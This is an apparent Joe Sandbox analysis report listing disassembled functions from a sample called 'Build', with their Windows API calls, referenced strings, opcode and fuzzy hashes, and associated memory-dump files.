Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: f87ac8b425218768be493336a0b25bfbdc49e0eb57b3f93d759006bfceadeda0
Instruction ID: 2edfdd7d9e1b843476b7db9194711f2c41c24dbd9a36005d5b8685e8c92acfcc
Opcode Fuzzy Hash: f87ac8b425218768be493336a0b25bfbdc49e0eb57b3f93d759006bfceadeda0
Instruction Fuzzy Hash: CA411B709043989EEF318F25CD84BF6BBA9EF45308F1404EEE59A87143D279AA45CF25

Function 0044D5BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0044D62D

Strings

LCMapStringEx, xrefs: 0044D5CD, 0044D5D7

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 584a523763cbcca71a266731c6ffa88cd91c1c62d5c5169c8933407b9577af21
Instruction ID: c9e6048d6d670f8ae6cdb9c05622a98d9ab65eee49587cae76b2368ad08c2759
Opcode Fuzzy Hash: 584a523763cbcca71a266731c6ffa88cd91c1c62d5c5169c8933407b9577af21
Instruction Fuzzy Hash: 06014832500208BBDF026F91DD02EEE7F62EF0C715F01415AFE0826161CA7AC931EB89

Function 0044D55A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0044CBBF), ref: 0044D5A5

Strings

InitializeCriticalSectionEx, xrefs: 0044D56B, 0044D575

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: f5460bf2976f360235aa34a96b224d5b765ae27bbab5aca8e375d3dd2cef34ac
Instruction ID: 2da34d19870a974e564223d86661bd8b5d4ea5deaa08cda2deb5e8120399282f
Opcode Fuzzy Hash: f5460bf2976f360235aa34a96b224d5b765ae27bbab5aca8e375d3dd2cef34ac
Instruction Fuzzy Hash: 31F0E931A4121CBBDF11AF61DD01EAEBF61EF18712B40426BFC0417261CA798E20D79D

Function 0044D3FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0044D43E

Strings

FlsAlloc, xrefs: 0044D410, 0044D41A

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: cc6b63c2b7e200d7366d93472f9d1fa4a899b4e1a168588db8f27ffba58a996a
Instruction ID: d125d1cfca85790eb640d8c8f178b84594901d1b2ce4da764680dea4d22ae18f
Opcode Fuzzy Hash: cc6b63c2b7e200d7366d93472f9d1fa4a899b4e1a168588db8f27ffba58a996a
Instruction Fuzzy Hash: A8E05530A40308B7E2006BA59C02F2EBB65CB48712F81027BFD0513282CDB8AE5092CE

Function 004410A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 004410BA

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Strings

3So, xrefs: 004410A8, 004410B4

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3So
API String ID: 1269201914-1105799393
Opcode ID: 53aa70611966f32ae12608483e4fcbb8d483afe0da81657c4da14f1e3f06357c
Instruction ID: 4f98775a6481dc2c208a2348cd469caa3aa8c62e04d3c6113a17779c4fa48904
Opcode Fuzzy Hash: 53aa70611966f32ae12608483e4fcbb8d483afe0da81657c4da14f1e3f06357c
Instruction Fuzzy Hash: FBB092E1299100AC32143185A812C3A0208C080B19330CA2FF800C0082995C6CCD503B

Function 0044E240 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0044DE0B: GetOEMCP.KERNEL32(00000000,?,?,0044E094,?), ref: 0044DE36

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044E0D9,?,00000000), ref: 0044E2B4
GetCPInfo.KERNEL32(00000000,0044E0D9,?,?,?,0044E0D9,?,00000000), ref: 0044E2C7

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 95cf63b09bd0f0bf6b696828c4922e17a679960f45e8d00d451e24f4d180651a
Instruction ID: f2044c466d75e449f4fe8fb6d06eca1f7dd2b9a2aeeee186f46ffc5be8a9f21e
Opcode Fuzzy Hash: 95cf63b09bd0f0bf6b696828c4922e17a679960f45e8d00d451e24f4d180651a
Instruction Fuzzy Hash: 97513570E006059EFB228F73C8816BBFBE5FF41304F1444AFD8968B252D67D99428B99

Function 0042B45F Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,0042B43B,00000800,00000800,00000000,?,?,0042A31D,?), ref: 0042B5EB
GetLastError.KERNEL32(?,?,0042A31D,?,?,?,?,?,?,?,?), ref: 0042B5FA

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3d92ceaf4a50b99a454d704b5f07e2306786be64c9184d21171c3a49a00dedd1
Instruction ID: e616b83c89b01beeabd887c95402f4ed3689df3b27b523d7a4654f35958b928c
Opcode Fuzzy Hash: 3d92ceaf4a50b99a454d704b5f07e2306786be64c9184d21171c3a49a00dedd1
Instruction Fuzzy Hash: 5C41D631704361ABD720AF65E5849AA73E5EF58324F90052FE44587342D7BCD8C18BDA

Function 0042B01E Relevance: 3.1, APIs: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0042B967,?,?,004287FD), ref: 0042B0A4
CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0042B967,?,?,004287FD), ref: 0042B0D4

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 71c571d6f5e301bd2c32a49e136ded9c2ebdd81991df4b9ca3b7255edfb669ec
Instruction ID: 83407b6214dba9fc350a96415c4dca2361d9f9a2f0575db57d93ecb06acc1243
Opcode Fuzzy Hash: 71c571d6f5e301bd2c32a49e136ded9c2ebdd81991df4b9ca3b7255edfb669ec
Instruction Fuzzy Hash: 4521C1716003446FE330CF25DC85BB7B7DCEB48725F804A2EF9A5C22D1D778A84486A6

Function 0042B7E2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?), ref: 0042B7FC
SetFileTime.KERNELBASE(?,?,?,?), ref: 0042B8B0

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: e94142e9c04eed6ae11f6d1abd996e2248ca48bdc3928a688ebdd927756c3e34
Instruction ID: e681f3d1c571e3f71a017b468bcd4629e8e8af92aff967cea8bda9952cddd2a5
Opcode Fuzzy Hash: e94142e9c04eed6ae11f6d1abd996e2248ca48bdc3928a688ebdd927756c3e34
Instruction Fuzzy Hash: F321E1312483519BC714EF25D891ABBBBE8EF65305F88491EF4C987241D32DD90CD7A6

Function 00421FB0 Relevance: 3.1, APIs: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00421FB7
_wcslen.LIBCMT ref: 00422052

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: H_prolog3_wcslen
String ID:
API String ID: 3746244732-0
Opcode ID: 71ac16b2d2208cbb6075be92aad9fd8cb99c6ac5d6fa3bb98b9509be657d7c07
Instruction ID: 38f7d5c687ed3d5caf16a62b139c1192d802cd5adf67efae4bdf6514c40b13ff
Opcode Fuzzy Hash: 71ac16b2d2208cbb6075be92aad9fd8cb99c6ac5d6fa3bb98b9509be657d7c07
Instruction Fuzzy Hash: 5D219D31A00229AFCF11AF95D845AEEB7B2BF0C304F50042EF545BB2A1CB7D5A51DB18

Function 00446192 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000001,004860C8,?,?,?,00446386,00000004,InitializeCriticalSectionEx,00459624,InitializeCriticalSectionEx,00000000,?,0044613D,004860C8,00000FA0), ref: 00446215
GetProcAddress.KERNEL32(00000000,?), ref: 0044621F

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID:
API String ID: 3013587201-0
Opcode ID: 81b3677b0a5d887147cfc119a4844e68b59d590e05c0e4c66ad2d8af32408a6b
Instruction ID: 45934ae8931e25829e8277688b7f9cd6b2313da84a4ffbebea63f151bc122174
Opcode Fuzzy Hash: 81b3677b0a5d887147cfc119a4844e68b59d590e05c0e4c66ad2d8af32408a6b
Instruction Fuzzy Hash: 95110331600115AFAF23DFA4DC8089A73A4FB0776171601AAEA15D7301E774DD01CB9A

Function 0042B8C0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0042B907
GetLastError.KERNEL32 ref: 0042B914

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fc55810e4e7362266ba6450d5724dbe1d241e16aa4b3bfad3146c10d8369fb36
Instruction ID: 41364ff8ed576302c5ced7e869a4190a67d2d093b15b967cd04a3b49fca6fb66
Opcode Fuzzy Hash: fc55810e4e7362266ba6450d5724dbe1d241e16aa4b3bfad3146c10d8369fb36
Instruction Fuzzy Hash: 7511C270B00720ABD7249629DC45767B3E8EB05371FE0462AE252932D0E778ED85D799

Function 0044BB34 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044BB55

Part of subcall function 0044BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00446A24,?,0000015D,?,?,?,?,00447F00,000000FF,00000000,?,?), ref: 0044BCC0

HeapReAlloc.KERNEL32(00000000,?,?,?,?,004650C4,0042190A,?,?,00000007,?,?,?,00421476,?,00000000), ref: 0044BB91

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: e70746fca528dce0aa8aa004b78322b0eebd6509b96837ed6ae898198c5ac41d
Instruction ID: 138b77022ea87099cafb53f0e2368ffd90b3acba70498fd28165dc387c7bd41d
Opcode Fuzzy Hash: e70746fca528dce0aa8aa004b78322b0eebd6509b96837ed6ae898198c5ac41d
Instruction Fuzzy Hash: 2BF0C231900645A6FB212A67AC41F6B3718DF81B75F11412BF805976A5DF2CEC0191EE

Function 0042C2E5 Relevance: 3.0, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0042BF5E,?,?), ref: 0042C305

Part of subcall function 0042DA1E: _wcslen.LIBCMT ref: 0042DA59

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0042BF5E,?,?), ref: 0042C334

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: d4f11295aaf1635448f1701dd44d72178d5d3aaa66c82d6720d94bf5c9a5e854
Instruction ID: e02c068b31109a81bcdb3801ad711b79be8ba340684e5af8735c5b5f85b6e4da
Opcode Fuzzy Hash: d4f11295aaf1635448f1701dd44d72178d5d3aaa66c82d6720d94bf5c9a5e854
Instruction Fuzzy Hash: A9F09631601229ABDB00DF719C41AEF77ACEF09715F8080AAB901D7251DA75DE848BA8

Function 0042BC65 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,0042B14B,?,00000000,0042AF6E,D72E4020,00000000,0045517A,000000FF,?,00428882,?,?), ref: 0042BC82

Part of subcall function 0042DA1E: _wcslen.LIBCMT ref: 0042DA59

DeleteFileW.KERNEL32(?,?,?,00000800,?,0042B14B,?,00000000,0042AF6E,D72E4020,00000000,0045517A,000000FF,?,00428882,?), ref: 0042BCAE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 04d2b5306c5e704755bf08359dabb64ec276a72a2c240b2730d0a70a66f0f45e
Instruction ID: 4ab206317b44bc7da426bfc57fb230252b82b3f06e259e96d6ad970212c047ac
Opcode Fuzzy Hash: 04d2b5306c5e704755bf08359dabb64ec276a72a2c240b2730d0a70a66f0f45e
Instruction Fuzzy Hash: 60F0B435701228ABD700DF619D41EDE73AC9F0C705F80406ABA01D3181DFB4DE888B9C

Function 0044030B Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00440341

Part of subcall function 00424C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00424C13

SetDlgItemTextW.USER32(00000065,?), ref: 00440358

Part of subcall function 0043D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043D875
Part of subcall function 0043D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043D886
Part of subcall function 0043D864: IsDialogMessageW.USER32(00020494,?), ref: 0043D89A
Part of subcall function 0043D864: TranslateMessage.USER32(?), ref: 0043D8A8
Part of subcall function 0043D864: DispatchMessageW.USER32(?), ref: 0043D8B2

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 622774751ca8680d572d81afd86de52fd378c993c162359091f8f99c59211425
Instruction ID: 3bdd39733d77ea4bbc74120fc01d6073e7abf28d2376d928d8c01b5134dd61bf
Opcode Fuzzy Hash: 622774751ca8680d572d81afd86de52fd378c993c162359091f8f99c59211425
Instruction Fuzzy Hash: 37F0BB716102186ADB01FB7BDD16EEF77AC9B0D309F04046BF24193152D9789A408B69

Function 0042BCDD Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,0042BCD4,?,00428607,?), ref: 0042BCFA

Part of subcall function 0042DA1E: _wcslen.LIBCMT ref: 0042DA59

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,0042BCD4,?,00428607,?), ref: 0042BD24

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: e7583da1a6866fd2c341652a9f4e263ec6866d77fcc8cadb7ca166d89a0e20de
Instruction ID: 27030868cfa0ccbac7dad9776b5705b1436c81da26fabacec4cc6e99fc173fdf
